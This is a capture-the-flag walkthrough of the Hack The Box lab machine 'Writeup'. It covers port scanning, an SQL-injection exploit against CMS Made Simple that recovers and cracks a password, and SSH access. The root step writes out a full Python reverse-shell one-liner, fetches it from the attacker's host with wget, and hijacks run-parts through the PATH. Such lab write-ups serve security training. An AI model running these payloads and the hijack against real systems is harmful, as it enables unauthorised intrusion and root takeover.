Writeup is an easy Linux box that was released back in June 2019.
As always we begin our Enumeration using Nmap to enumerate opened ports. We will be using the flags -sC for default scripts and -sV to enumerate versions.
λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → nmap -F 10.10.10.138 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 08:42 GMT Nmap scan report for writeup.htb (10.10.10.138) Host is up (0.098s latency). Not shown: 98 filtered ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 3.30 seconds
Looks like we have 2 ports opened, let's investigate the 80th port.
λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → nmap -sCV -p80 10.10.10.138 Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 08:42 GMT Nmap scan report for writeup.htb (10.10.10.138) Host is up (0.094s latency). PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.25 ((Debian)) | http-robots.txt: 1 disallowed entry |_/writeup/ |_http-title: Nothing here yet. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.60 seconds
let's add writeup.htb to our /etc/hosts
λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → echo '10.10.10.138 writeup.htb' >> /etc/hosts
Taking a first glance at the webpage on port 80, we use the curl command with the -sk flags.
λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → curl -sk http://writeup.htb/ ######################################################################## # # # *** NEWS *** NEWS *** NEWS *** NEWS *** NEWS *** # # # # Not yet live and already under attack. I found an ,~~--~~-. # # Eeyore DoS protection script that is in place and + | |\ # # watches for Apache 40x errors and bans bad IPs. || |~ |`,/-\ # # Hope you do not get hit by false-positive drops! *\_) \_) `-' # # # # If you know where to download the proper Donkey DoS protection # # please let me know via mail to jkr@writeup.htb - thanks! # # # ######################################################################## aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa 88888888888888888888888888888888888888888888888888888 8888"""""""""""""""8888888888888888888888888888888888 8888 8888888888888888888888888888888888 8888 HTB NOTES 8888888888888888888888888888888888 8888 888888888888888888888888888888888" 8888aaaaaaaaaaaaaaa888888888888888888888888888888888a 88888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888":::::"88888888888888888888888 888888888888888888888::;gPPRg;::888888888888888888888 88888888888888888888::dP' `Yb::88888888888888888888 88888888888888888888::8) (8::88888888888888888888 88888888888888888888;:Yb dP:;88( )888888888888888 888888888888888888888;:"8ggg8":;888888888888888888888 88888888888888888888888aa:::aa88888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888888888888888888888888888888888 88888888888888888888888888"88888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 8888888888888888888888888:::8888888888888888888888888 88888888888888888888888888a88888888888888888888888888 """""""""""""""""""' `"""""""""' `""""""""""""""""""" (c) by Normand Veilleux I am still searching through my backups so there is nothing here yet. I am preparing go-live of my own www.hackthebox.eu write-up page soon. Stay tuned! λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50
nothing too interesting there, apart from some information about "Apache 40x", let's run dirsearch to see which directories we can find.
λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → dirsearch -u http://writeup.htb/ -e txt,php,html,js -t 50 git clone https://github.com/maurosoria/dirsearch.git dirsearch -u-e -t 50 -x 500 _|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| ) Extensions: txt, php, html, js | HTTP method: get | Threads: 50 | Wordlist size: 7126 Error Log: /home/ech0/Desktop/Tools/dirsearch/logs/errors-20-02-15_08-47-45.log Target: http://writeup.htb/ [08:47:45] Starting: 0.84% - Last request to: .bzr/README
looks like this was a bad idea, the server seems to have blacklisted us. Instead we will use the nikto command.
λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → nikto -h http://10.10.10.138/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 10.10.10.138 + Target Hostname: 10.10.10.138 + Target Port: 80 + Start Time: 2020-02-15 08:52:24 (GMT0) --------------------------------------------------------------------------- + Server: Apache/2.4.25 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + ERROR: Error limit (20) reached for host, giving up. Last error: opening stream: can't connect (timeout): Transport endpoint is not connected + Scan terminated: 20 error(s) and 3 item(s) reported on remote host + End Time: 2020-02-15 08:53:16 (GMT0) (52 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
nothing too interesting there, nikto seems to timeout on the host, let's check robots.txt
λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → curl -sk http://10.10.10.138/robots.txt # __ # _(\ |@@| # (__/\__ \--/ __ # \___|----| | __ # \ }{ /\ )_ / _\ # /\__/\ \__O (__ # (--/\--) \__/ # _)( )(_ # `---''---` # Disallow access to the blog until content is finished. User-agent: * Disallow: /writeup/
checking out http://10.10.10.138/writeup/ , we are greeted with some sort of a menu, let's look at it's source menu for anything fancy.
λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → curl -sk http://10.10.10.138/writeup/ | grep CMS <meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
looks like we have a CMS Made Simple from 2004 ! let's run a quick searchsploit command to see which exploits are available for us
λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → searchsploit CMS Made Simple | grep Injection CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | exploits/php/webapps/29941.txt CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | exploits/php/webapps/4810.txt CMS Made Simple < 2.2.10 - SQL Injection | exploits/php/webapps/46635.py
exploit number 46635.py looks interesting, let's locate it and paste it in our current folder.
λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → locate 46635.py /usr/share/exploitdb/exploits/php/webapps/46635.py λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → cp /usr/share/exploitdb/exploits/php/webapps/46635.py . λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → nano 46635.py
Looking at the exploit we're going to use, we'll need to specify a few flags : -u for the URL --crack and -w for wordlist
λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → python 46635.py -u http://10.10.10.138/writeup --crack -w /usr/share/wordlists/rockyou.txt [+] Salt for password found: 5a599ef579066807 [+] Username found: jkr [+] Email found: jkr@writeup.htb [+] Password found: 62def4866937f08cc13bab43bb14e6f7 [+] Password cracked: raykayjay9
looks like our exploit worked ! we now have credentials to work with : jkr:raykayjay9 , let's try to get in using ssh.
λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → ssh jkr@writeup.htb The authenticity of host 'writeup.htb (10.10.10.138)' can't be established. ECDSA key fingerprint is SHA256:TEw8ogmentaVUz08dLoHLKmD7USL1uIqidsdoX77oy0. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'writeup.htb,10.10.10.138' (ECDSA) to the list of known hosts. jkr@writeup.htb's password: Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux The programs included with the Devuan GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Devuan GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. jkr@writeup:~$ uname -a Linux writeup 4.9.0-8-amd64 #1 SMP Debian 4.9.144-3.1 (2019-02-19) x86_64 GNU/Linux jkr@writeup:~$ cat /home/jkr/user.txt d4XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
to escalate privileges to the root user, let's see what we can use to get a reverse shell onto the box
jkr@writeup:~$ which python /usr/bin/python
looks like we can use python to do so, let's ready our reverse shell in python
Terminal 1:λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → cat ech0.py python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.14.10",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' λ root [ 10.10.14.10/23 ] [ech0/_HTB/Writeup] → python -m SimpleHTTPServer 8080 Serving HTTP on 0.0.0.0 port 8080 ...Terminal 2:
λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → nc -lvnp 1234 listening on [any] 1234 ...Terminal 3:
jkr@writeup:~$ wget 10.10.14.10:8080/ech0.py -O /usr/local/bin/run-parts --2020-02-15 03:53:00-- http://10.10.14.10:8080/ech0.py Connecting to 10.10.14.10:8080... connected. HTTP request sent, awaiting response... 200 OK Length: 240 [text/plain] Saving to: ‘/usr/local/bin/run-parts’ /usr/local/bin/run-parts 100%[===============================================>] 240 --.-KB/s in 0s 2020-02-15 03:53:00 (52.9 MB/s) - ‘/usr/local/bin/run-parts’ saved [240/240] jkr@writeup:~$ chmod +x /usr/local/bin/run-parts
Each time a user logs in, a process sets the PATH for that user and run-parts binary since we are part of the STAFF group, we can place our own run-parts binary in /usr/local/bin, cron will execute our own run-parts next time a new user logs in. And all that's left for us to do, is to log in another time as jkr, and it will activate our ech0.py reverse shell and that way we will catch the incoming reverse shell connection through our second terminal.
Terminal 5:λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → ssh jkr@10.10.10.138 jkr@10.10.10.138's password:Terminal 2:
λ ech0 [ 10.10.14.10/23 ] [~/_HTB/Writeup] → nc -lvnp 1234 listening on [any] 1234 ... connect to [10.10.14.10] from (UNKNOWN) [10.10.10.138] 57070 bash: cannot set terminal process group (2193): Inappropriate ioctl for device bash: no job control in this shell root@writeup:/# cat /root/root.txt cat /root/root.txt eeXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
Here we can see the progress graph :